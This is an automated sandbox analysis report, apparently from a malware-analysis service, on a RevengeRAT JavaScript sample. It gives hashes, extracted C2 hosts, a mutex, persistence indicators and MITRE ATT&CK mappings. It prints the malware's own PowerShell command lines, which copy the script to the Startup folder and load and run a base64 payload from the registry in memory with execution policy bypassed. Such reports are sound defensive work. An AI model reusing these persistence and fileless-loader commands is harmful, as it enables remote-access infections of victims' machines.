revengerat | 1572fa79a4de01323cc1f469d514d9711b3f88f47eedf6af7041f595d23f0c6a

General

Target

d7520f1f5438e4e82c1234fbcb10c6dc.js
Size

32KB
MD5

d7520f1f5438e4e82c1234fbcb10c6dc
SHA1

3519cb4f9c82611a9a40e3d15b3fb5432bad023e
SHA256

1572fa79a4de01323cc1f469d514d9711b3f88f47eedf6af7041f595d23f0c6a
SHA512

2f7069d30f6d6e078510f7052370eeb0b13a13bc46c1482a213dcb224d1996ea2243b8a52962b4d1617f7359ebfd9e832d33762f61cfab92476ea82120bacfa3
SSDEEP

768:PhbHMfBd7PENmw5hWh70OyDbod+wvlJKAiv6AGi0/ZWThQ:5HMfzemquy3od+wvlJKAi9Gi0B2Q

Score

10^/10

revengerat office persistence stealer trojan

Malware Config

Extracted

Family

revengerat

Botnet

Office

C2

workwinrarhost.ddns.com.br:333

office.minhaempresa.tv:333

Mutex

RV_MUTEX-ViGGjjtnxDpnFw

Signatures

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

RevengeRat Executable 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/2828-12-0x0000000002830000-0x000000000283A000-memory.dmp	revengerat

Blocklisted process makes network request 20 IoCs

Processes:

powershell.exe

flow	pid	process
3	2828	powershell.exe
4	2828	powershell.exe
6	2828	powershell.exe
7	2828	powershell.exe
8	2828	powershell.exe
9	2828	powershell.exe
10	2828	powershell.exe
11	2828	powershell.exe
12	2828	powershell.exe
14	2828	powershell.exe
15	2828	powershell.exe
17	2828	powershell.exe
18	2828	powershell.exe
19	2828	powershell.exe
20	2828	powershell.exe
21	2828	powershell.exe
22	2828	powershell.exe
23	2828	powershell.exe
25	2828	powershell.exe
26	2828	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Office.vbs	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d7520f1f5438e4e82c1234fbcb10c6dc.js	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Office = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2828 powershell.exe
2832 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2828 powershell.exe
Token: SeDebugPrivilege 2832 powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	powershell.exe

pid	process
2828	powershell.exe
2832	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2828	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

wscript.exe

description	pid	process	target process
PID 272 wrote to memory of 2832	272	wscript.exe	powershell.exe
PID 272 wrote to memory of 2832	272	wscript.exe	powershell.exe
PID 272 wrote to memory of 2832	272	wscript.exe	powershell.exe
PID 272 wrote to memory of 2828	272	wscript.exe	powershell.exe
PID 272 wrote to memory of 2828	272	wscript.exe	powershell.exe
PID 272 wrote to memory of 2828	272	wscript.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js
1⤵
- Suspicious use of WriteProcessMemory
PID:272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\d7520f1f5438e4e82c1234fbcb10c6dc.js',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\d7520f1f5438e4e82c1234fbcb10c6dc.js'))"
2⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'KeyName').KeyName;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
2⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
f19d9ea6a6a0d49bf8b37f9575e94712

SHA1
789cd1284971429d4677f3694508c619703899ce

SHA256
a4bc1eb07371da6a6a59fbc8cfa947003825544823fd81baa17a7a288158083d

SHA512
592665aa84aecb432a1c8c4ebae6a25bdab0875cee1376e7485757477c2cf7e9ff5d6e52a4dcc3414cce62fd3ae30a764ffff93c55023ffc1a275f3b6aae186d

Download Submit
memory/2828-19-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2828-10-0x00000000024F0000-0x00000000024F8000-memory.dmp

Filesize
32KB

Download
memory/2828-29-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2828-12-0x0000000002830000-0x000000000283A000-memory.dmp

Filesize
40KB

Download
memory/2828-27-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2828-28-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2828-26-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2828-16-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2828-17-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2828-18-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2828-21-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2832-20-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2832-22-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-23-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-25-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2832-24-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2832-14-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2832-15-0x00000000025A0000-0x0000000002620000-memory.dmp

Filesize
512KB

Download
memory/2832-13-0x000007FEF5A40000-0x000007FEF63DD000-memory.dmp

Filesize
9.6MB

Download
memory/2832-9-0x000000001B190000-0x000000001B472000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads